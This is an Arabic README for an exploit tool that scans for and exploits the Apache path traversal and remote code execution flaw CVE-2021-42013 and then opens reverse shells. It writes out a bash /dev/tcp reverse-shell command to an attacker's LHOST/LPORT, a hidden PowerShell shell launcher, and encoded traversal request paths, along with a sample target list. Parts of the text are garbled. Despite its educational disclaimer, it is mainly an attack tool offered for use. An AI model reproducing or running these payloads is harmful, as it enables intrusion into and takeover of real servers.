
أداة متقدمة للمسح والاستغلال والتفاعل عن بُعد مصممة لاكتشاف واستغلال ثغرة Apache Path Traversal + RCE (CVE-2021-42013) في الخوادم غير المهيأة بشكل آمن.
💀 وضع الهاكر الكوني متعدد الأبعاد نشط...
أداة متقدمة للمسح والاستغلال والتفاعل عن بُعد مصممة لاكتشاف واستغلال الثغرة Apache Path Traversal + RCE (CVE-2021-42013) في الخوادم غير المهيأة بشكل صحيح.
يتم توفير هذا البرنامج للأغراض التعليمية والبحثية فقط في البيئات الخاضعة للرقابة.
قد يكون استخدام هذه الأداة ضد أنظمة دون إذن صريح غير قانوني ويشكل جريمة في العديد من البلدان.
المؤلف غير مسؤول عن أي استخدام غير لائق لهذا الكود. استخدمه على مسؤوليتك الخاصة ودائمًا بإذن صريح من مالك النظام المستهدف.
تتيح هذه الأداة ما يلي:
.txt.subprocess و curl)pip install -r requirements.txt
requirements.txt
rich
alive-progress
تحتاج أيضًا إلى تثبيت curl على نظام التشغيل.
.
├── POC-CVE.py # النص الرئيسي
├── logs.txt # ملف السجلات الذي يتم إنشاؤه تلقائيًا
├── requirements.txt # تبعيات Python
└── targets.txt # (اختياري) قائمة عناوين URL للمسح
python3 POC-CVE.py
اختر من بين:
scan_file: مسح عناوين URL متعددة من ملف وعرض أي منها ضعيف.exploit: استغلال مباشر لهدف واحد، مع شل عكسية.exit: الخروج من الوضع التفاعلي.http://example.com
http://victim.net
http://192.168.1.100
python3 POC-CVE.py
اختر scan_file وقدم:
exploit من القائمة.LHOST) لاستقبال الشلLPORT) للمستمعسينفذ النص:
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
powershell -NoP -NonI -W Hidden -Command ...
/.%252e/.%252e/.%252e)curlUser-Agent, Accept, إلخ)GET /cgi-bin/.%%32%65/.%%32%65/...يتم توفير هذا المشروع "كما هو"، دون أي ضمانات أو مسؤولية عن الأضرار الناتجة عن استخدامه. لا تقم أبدًا بمسح أو استغلال نظام دون موافقة صريحة من مالكه.
---